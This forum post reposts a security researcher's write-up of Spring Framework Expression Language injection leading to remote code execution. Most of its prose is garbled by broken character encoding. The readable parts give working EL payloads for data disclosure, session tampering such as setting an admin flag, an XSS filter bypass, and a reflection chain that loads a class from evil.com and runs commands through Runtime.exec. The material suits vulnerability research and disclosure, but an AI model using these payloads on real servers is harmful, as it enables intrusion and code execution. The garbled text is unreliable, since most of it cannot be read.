��̳ › web app��͸����::��Web App penetration testing�� › spring-Զ�̴���ע��

admin ������ 2013-2-16 21:47:24

spring-Զ�̴���ע��

Remote Code with
Expression Language Injection
Spring Framework�����ԡ�DanAmodio
ȫ���糬��22,000��֯�Ѿ�������131.4���ʱ��Spring Framework��ʹ����ҵ����
���ܻ���ڷ��ա�
��2011�꣬����Minded Security ��Stefano Di Paola ������Aspect Security��
Arshan Dabirsiaghi ��Spring Framework�з�����һ����Ȥģʽ��Stefano������Expression Language (EL) ע�롣���ǵķ�����¶��ijЩ˫�صĽ���EL ��spring ��ǩ��
��й¶�������ϵ��������ݡ���������spring �ṩ�˶�����jsp/servlet������EL֧�֣�
�Դ�����Ϊ���¼��ݵ�һ�ַ�ʽ�������jsp2.0֮ǰ��EL �Dz���֧�ֵġ���������ڵ�ǰ
�汾����Ĭ�ϴ򿪵ģ�Ӧ�ó���ʹ���˴�ģʽ���������ܹ����ġ�
����ÿ��Ӧ�ó��򲢲�������ַ���xss�������㣬��Ȼ��������������Ⱥ͹�ȣ���
���Ǹ���Sonatype���µ�ͳ��֪����ȫ���糬��22,000����֯����Spring 3.0.5���°�
���Ѿ�����131.4 ��Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads��
��Щ�汾��֧�ֽ���double EL resolution.
�������ԭ����Ӱ������Ϣй¶�������ҽ�����˵���������Glassfish ����������
EL2.2�����Ͽ��ܽ���Զ�̴���ִ�С�
����һ��ԭʼ��Ϣй¶�Ĺ������ӣ�
����
ttp://vulnerable.com/foo?message=${applicationScope}
������������ҳ�棺
��������һЩ�����ڲ���������Ϣcalsspath �ͱ��ع���Ŀ¼
��Ҳ������һЩ�������飬��������
${9999+1}
�����Է���session �����beans
${employee.lastName}
��ִ��Glassfish�Ͽͻ���Ӧ�ó������͸����ʱ����������ͬ����ģʽ��֪�������
EL ע�룬���˶���IJ��Ժ�ȷ������һ���֣�ͬʱ������ȥ�������ھ�һЩ����ζ�Ķ�
��������XSS.
����Ӧ�ó�������������ֹ���ҵ��������ȥ���ˡ�����ǩ
ͻ�����룬���롰�ҿ�����JAVA�н����ַ����ݣ�Ϊʲô�Ҳ���������EL���ƹ�����
�أ���
��ˣ��ҳ�������£�
http://vulnerable.com/app?code=${param.foo.replaceAll(��P��,��Q��)}foo=PPPP
P
��ע�⵽���صĴ������ʱQQQQQ,����String.replaceall �����Ѿ������ã����Է�
�ص��ı����������spring:message ��ǩ��
������һ�������ƹ����˵�ʵ����
http://vulnerable.com/app?code=${param.foo.replaceAll(��P��,����)}&foo=PscriptQalert(1);P/scriptQ
�����еĺܺã�������һ��Сʱ��ʲô��û�롣Ȼ������ʶ���������������ġ�Ϊ
ʲô������EL�����������뷽����������,�һ�������Щ���������������?
����һ���о�����ѧϰ��EL2.2 �����˷������á�
��д��һ�����ٲ���Ӧ�ó�����벢�Ҽ��һЩ����
${pageContext.request.getSession().setAttribute(��account��,��123456��)}
${pageContext.request.getSession().setAttribute(��admin��,true)}
���ˣ��Ự�����޸���һ�����Եķ��ա��������Ӵ������󣬵�����û��һ��ֱ�ӵ�
ָ��pageContext����,Ҳ���ҿ���ʹ�÷��䣬��String.getClass().forName(string)��
${����.getClass().forName(��java.net.Socket��).newInstance().connect(��127.0.0.1
��, 1234)}
${����.getClass().forName(��java.lang.Runtime��)}
�ۣ�û�з����������������ڿ��ԽӴ����κζ�������������Եġ����ҵ��ǣ����Dz�
���ܵ���newinstance()��ʼ������Σ���ࣨ��Runtime������������û���ṩĬ�ϵĹ��캯
���������޷��������󡣵�������null����һ�������飬getMethods().invoke()����
һЩ���⡣�ڴ������ݵ�����֮ǰ��EL �ƺ���������Ϊһ���ַ�������ֵ���Ҳ²�������
����ǩ��invoke(Object obj, Object„ args)
Jeff Williams (Aspect Security ��OWASP���Ĵ�ʼ��) ��Arshan,���Ҷ�˼�������
�⣬���������Թ���������
©�����ã�
����ǽ��ײ���ҵ��Դ�bangbang�죬���Ѿ��þ��������뷨���������ǹ����������
ϣ�������е�һЩJAVA��Ÿ�����������˵Ŀ�Ц��
������һЩ���Թ���ʧ�ܵ�������Ϊ����ͼ����������������
 д�ļ����ļ�ϵͳ
 ��ͼ����org.springframework.expression.spel.standard.SpelExpressionParser.
����Ϊ��Щ���ԺܺõĹ����������Ҳ����ҵ����ʵ��������롣
${pageContext.getClass().getClassLoader().loadClass(��org.springframework.expression.spel.standard.SpelExpressionParser��)}
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
org.springframework.expression.spel.standard.SpelExpressionParser not found
by
org.glassfish.web.javax.servlet.jsp .
 ���÷������޸�java.lang.Runtime.currentRuntime������ΪPublic
 ���÷���������һ���µ�Runtime(and watch the world burn)
${pageContext.request.getSession().setAttribute(��rtc��,��".getClass().forName
(��java.lang.Runtime��)).getDeclaredConstructors())}
${pageContext.request.getSession().getAttribute(��rtc��).setAccessible(true)}
 ʹ��java.lang.ProcessBuilder
 �ñ���ʽ��������������ʽ����
Expression-ception �� ����������ҿ���ˣ����岢û���κ�ʵ������.
${pageContext.getExpressionEvaluator().parseExpression(��pageContext.request
��,��".getClass(),null)}
 ����һ��ObjectInputStream�����л�һ���ಢ������Ϊһ���������ͣ�Ҳ�е���
����ʹ��һ��������ͨ��Method.invoke()ʱʧ���˺ܶ��
����.getClass().forName(��java.lang.Runtime��).getMethods().invoke(param.foo
.getClass().forName(��java.lang.Runtime��),��".getClass().forName(��java.util.A
rrayList��).newInstance().toArray())
java.lang.IllegalArgumentException: wrong number of arguments
�����һ�������ұ�������һ������ǰ�����ܵõ�һ��URLClassLoader������ҿ�
�Դ���һ������class�ļ�����ָ����װ����.
��д��һ��JAVA �࣬����ͼ�򿪷������ϵļ���������֤��Զ�̴���ִ�У�
public class Malicious {
public Malicious() {
try {
java.lang.Runtime.getRuntime().exec(��open -a Calculator��); //Mac
java.lang.Runtime.getRuntime().exec(��calc.exe��); //Win
} catch (Exception e) {
}
}
���Ǵ�����һ�������б��������ڹ���һ���µ�URLClassLoader,����Ҫ���洢�ڻ�
���У���������Ա�ʹ��.
${pageContext.request.getSession().setAttribute(��arr��,��".getClass().forName
(��java.util.ArrayList��).newInstance())}
URLClassLoader �ṩ��һ��newInstance ������������URL�������顣������Ҫ����
һ���µİ������Ƕ������·����URL��ServletContext�����ṩ������һ��URL�����
getResource(string) �������������Dz�����ֱ�Ӵ���һ���µ�ʵ����Ȼ��URI�ṩ��һ��
���ǿ��Ե��õ�create(string)������Ȼ��ת����һ��URL����
${pageContext.request.getSession().getAttribute(��arr��).add(pageContext.getServletContext().getResource(��/��).toURI().create(��http://evil.com/path/to/wh
ere/malicious/classfile/is/located/��).toURL())}
Ȼ�����Ƿ�����һ����URLClassLoaderָʾ�������newInstance �������Ա����ã�
�������ļ���װ�ز�����������Զ�̴���.
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
xt.request.getSession().getAttribute(��arr��).toArray(pageContext.getClass().
getClassLoader().getParent().getURLs())).loadClass(��Malicious��).newInstance
()}

�鿴�����汾: spring-Զ�̴���ע��